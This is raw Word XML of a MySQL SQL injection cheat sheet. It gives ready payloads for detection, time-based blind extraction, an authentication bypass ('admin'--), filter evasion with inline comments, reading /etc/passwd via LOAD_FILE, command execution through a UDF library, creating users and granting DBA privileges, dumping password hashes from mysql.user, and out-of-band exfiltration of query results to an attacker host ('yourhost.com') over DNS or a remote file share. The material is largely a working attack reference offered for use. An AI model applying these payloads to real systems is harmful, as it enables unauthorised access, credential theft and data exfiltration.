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t>Initial Exploitation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5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2"/>
              <w:gridCol w:w="2618"/>
            </w:tblGrid>
            <w:tr w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidTr="00EA100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A100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA10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0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Version </w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA10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SELECT @@VERSION </w:t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SELECT version()</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidTr="00EA100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A100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA10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0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Current User</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA10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SELECT user()</w:t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SELECT system_user()</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidTr="00EA100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A100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA10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0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Current Database</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA10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SELECT database()</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl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t>Quick Detection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6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1"/>
              <w:gridCol w:w="8359"/>
            </w:tblGrid>
            <w:tr w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidTr="00EA100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A100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA10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0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Error Based </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00EA10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SQLi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EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA10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For integer inputs:</w:t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(select 1 and row(1,1)&gt;(select count(*),</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart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concat</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd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(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))</w:t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For string inputs:</w:t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'+(select 1 and row(1,1)&gt;(select count(*),</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart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concat</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd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(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'</w:t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The attacks above should throw 'duplicate entry' errors.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidTr="00EA100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A100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA10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0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Clear </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00EA10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SQLi</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00EA10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Tests</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA10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These tests are simply good for </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart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boolean</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd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sql</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd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injection and silent attacks.</w:t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</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart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product.php?id</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd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=4</w:t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</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart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product.php?id</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd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=5-1</w:t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</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart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product.php?id</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd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=4 OR 1=1</w:t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</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart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product.php?id</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd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=-1 OR 17-7=10</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl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t>Blind SQL Injection (Time Based)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7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7961"/>
            </w:tblGrid>
            <w:tr w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidTr="00EA100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A100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA10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0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### </w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA10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Use this when you </w:t>
                  </w:r>
                  <w:r w:rsidR="00F94CA2"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cannot</w:t>
                  </w:r>
                  <w:bookmarkStart w:id="0" w:name="_GoBack"/>
                  <w:bookmarkEnd w:id="0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see any difference at output. Second do not use more than 30 seconds, because database API connection timeout could be easily reached. </w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidTr="00EA100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A100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA10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0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###</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA10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This is just like sleep, wait for </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart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spesified</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd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time. CPU safe way to make database wait.</w:t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SLEEP(25)--</w:t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SELECT BENCHMARK(1000000,MD5('A'));</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidTr="00EA100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A100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA10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0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Real World Samples</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA10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ProductID</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd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=1 OR SLEEP(25)=0 LIMIT 1-- </w:t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</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart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ProductID</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd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=1) OR SLEEP(25)=0 LIMIT 1-- </w:t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</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart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ProductID</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd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=1' OR SLEEP(25)=0 LIMIT 1-- </w:t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</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart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ProductID</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd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=1') OR SLEEP(25)=0 LIMIT 1-- </w:t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</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart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ProductID</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd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=1)) OR SLEEP(25)=0 LIMIT 1-- </w:t>
                  </w:r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</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart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ProductID</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00EA10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=SELECT SLEEP(25)--</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl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lastRenderedPageBreak/>
              <w:t>Line Comments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8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DROP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sampletable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;--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DROP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sampletable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;#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Username : admin'--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                : admin' or '1'='1'--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SELECT * FROM members WHERE $username = 'admin'--' AND $password = 'password'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This is going to </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia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</w:rPr>
              <w:t>log you as admin user</w:t>
            </w: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, because rest of the SQL query will be ignored.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t>Inline Comments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9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</w:rPr>
              <w:t>Comments out rest of the query by not closing them </w:t>
            </w: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or you can use for </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia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</w:rPr>
              <w:t>bypassing blacklisting</w:t>
            </w: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, removing spaces, obfuscating and determining database versions.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA100A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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DROP/*comment*/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sampletable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA100A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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DR/**/OP/*bypass blacklisting*/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sampletable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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t>If Statements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10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Get response based on </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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a</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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if statement. This is one of the key points of Blind SQL Injection, also can be very useful to test simple stuff blindly and accurately.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</w:rPr>
              <w:t>MySQL If Statement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</w:p>
          <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA100A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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IF </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs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condition true-part </w:t>
            </w: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ELSE </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs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false-part</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA100A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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SELECT IF (1=1, ‘true’, ‘false’)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lastRenderedPageBreak/>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia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</w:rPr>
              <w:t>If Statement SQL Injection Attack Samples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SELECT IF(user()='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root@localhost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','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true','false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')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lastRenderedPageBreak/>
              <w:t>String without Quotes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11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SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))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This will return ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia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</w:rPr>
              <w:t>KLM</w:t>
            </w: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’.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t>Bulk Insert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12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Insert a file content to a table.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SELECT * FROM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mytable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INTO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dumpfile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'/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tmp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somefile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'; --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t>Load File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13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' UNION ALL SELECT LOAD_FILE('/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etc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passwd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') --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SELECT LOAD_FILE(0x633A5C626F6F742E696E69)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This will show the content of </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia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</w:rPr>
              <w:t>c:\boot.ini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t>Command Execution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14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Possible with using </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia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</w:rPr>
              <w:t>UDF</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs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 (user defined functions)</w:t>
            </w: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.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</w:p>
          <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00F94CA2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hyperlink r:id="rId15" w:tgtFrame="_blank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24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>http://packetstormsecurity.org/libraries/lib_mysqludf_sys_0.0.3.tar.gz</w:t>
              </w:r>
            </w:hyperlink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t>Create Users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16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CREATE USER </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"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username</w:t>
            </w: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 IDENTIFIED BY '</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"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password</w:t>
            </w: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'; --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8C4732" w:rsidRDefault="008C4732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</w:p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lastRenderedPageBreak/>
              <w:t>Drop Users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17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DROP USER </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"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username</w:t>
            </w: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; --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lastRenderedPageBreak/>
              <w:t>Make User DBA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18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GRANT ALL PRIVILEGES ON *.* TO </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"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username</w:t>
            </w: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@'%';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t>List Users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19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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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SELECT * FROM 'user' WHERE 1 LIMIT 0,30</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA100A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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SELECT * FROM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mysql.user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WHERE 1 LIMIT 1,1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA100A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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SELECT * FROM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mysql.user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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t>List Passwords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20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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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SELECT user, password FROM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mysql.user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA100A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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SELECT user, password FROM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mysql.user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LIMIT 1,1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA100A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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SELECT password FROM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mysql.user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WHERE user = 'root'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t>List Databases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21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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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SELECT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schema_name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FROM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information_schema.schemata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;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA100A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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SELECT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schema_name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FROM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information_schema.schemata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LIMIT 1,1;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t>Privileges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22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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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SELECT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Super_priv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FROM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mysql.user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WHERE user=(SELECT user) LIMIT 1,1--</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA100A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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lastRenderedPageBreak/>
              <w:t xml:space="preserve">SELECT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Super_priv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FROM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mysql.user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WHERE user= ‘root’ LIMIT 1,1--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lastRenderedPageBreak/>
              <w:t>Getting user defined tables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23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SELECT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table_name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FROM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information_schema.tables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WHERE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table_schema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= '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"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tblUsers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'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A100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"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tblUsers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"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 xml:space="preserve"> -&gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"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tablename</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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t>Getting Column Names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24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SELECT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table_name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column_name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FROM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information_schema.columns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WHERE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table_schema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= '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"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tblUsers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’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A100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"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tblUsers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"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 xml:space="preserve"> -&gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"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tablename</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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SELECT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table_schema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table_name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FROM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information_schema.columns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WHERE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column_name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= '</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"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username</w:t>
            </w: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';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find table which have a column called 'username'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t>Default Databases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25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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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information_schema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(&gt;=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mysql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 xml:space="preserve"> 5.0)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA100A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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t>Path of DB files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26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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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SELECT @@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datadir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA100A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="312" w:lineRule="atLeast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C:\AppServ\MySQL\data\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t xml:space="preserve">Time Based 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t>SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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t xml:space="preserve"> Exploitation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27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lastRenderedPageBreak/>
              <w:t>?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vulnerableParam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=-99 OR IF((ASCII(MID(({</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia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</w:rPr>
              <w:t>INJECTON</w:t>
            </w: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}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1--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b/>
                <w:bCs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{INJECTION} </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"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= You want to run the query.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If the condition is true, will response after 14 seconds. If is false, will be delayed for one second.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</w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidTr="00EA100A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA100A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:outlineLvl w:val="1"/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</w:pPr>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
                <w:color w:val="3787DE"/>
                <w:spacing w:val="-15"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Out of Band Channel</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00F94CA2" w:rsidP="00EA100A">
            <w:pPr>
              <w:spacing w:after="300" w:line="240" w:lineRule="auto"/>
              <w:outlineLvl w:val="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
                <w:color w:val="3787DE"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId28" w:history="1">
              <w:r w:rsidR="00EA100A" w:rsidRPr="00EA100A">
                <w:rPr>
                  <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
                  <w:color w:val="3787DE"/>
                  <w:sz w:val="19"/>
                  <w:szCs w:val="19"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Back to top</w:t>
              </w:r>
            </w:hyperlink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?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vulnerableParam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=-99 OR (SELECT LOAD_FILE(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concat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('\\\\',(</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia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</w:rPr>
              <w:t>{INJECTION}</w:t>
            </w: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), 'yourhost.com\\'))) Makes a NBNS query request/DNS resolution request to yourhost.com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?</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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vulnerableParam</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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=-99 OR (SELECT (</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="666666"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>{INJECTION}</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A"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  <w:t>) INTO OUTFILE '\\\\yourhost.com\\share\\output.txt') Writes data to your shared folder/file</w:t>
            </w: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</w:p>
          <w:p w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA100A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4"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs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{INJECTION} </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="666666"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>= You want to run the query.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003829FA" w:rsidRDefault="00F94CA2"/>
    <w:p w:rsidR="00EA100A" w:rsidRDefault="00EA100A"/>
    <w:p w:rsidR="00EA100A" w:rsidRDefault="00EA100A"/>
    <w:p w:rsidR="00EA100A" w:rsidRDefault="00EA100A"/>
    <w:p w:rsidR="00EA100A" w:rsidRDefault="00EA100A"/>
    <w:p w:rsidR="00EA100A" w:rsidRDefault="00EA100A"/>
    <w:p w:rsidR="00EA100A" w:rsidRDefault="00EA100A"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1048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7865"/>
      </w:tblGrid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SELECT DBINFO(‘version’, ‘full’)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WHERE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1;</w:t>
            </w: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br/>
              <w:t xml:space="preserve">SELECT DBINFO(‘version’, ‘server-type’)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WHERE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1;</w:t>
            </w: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br/>
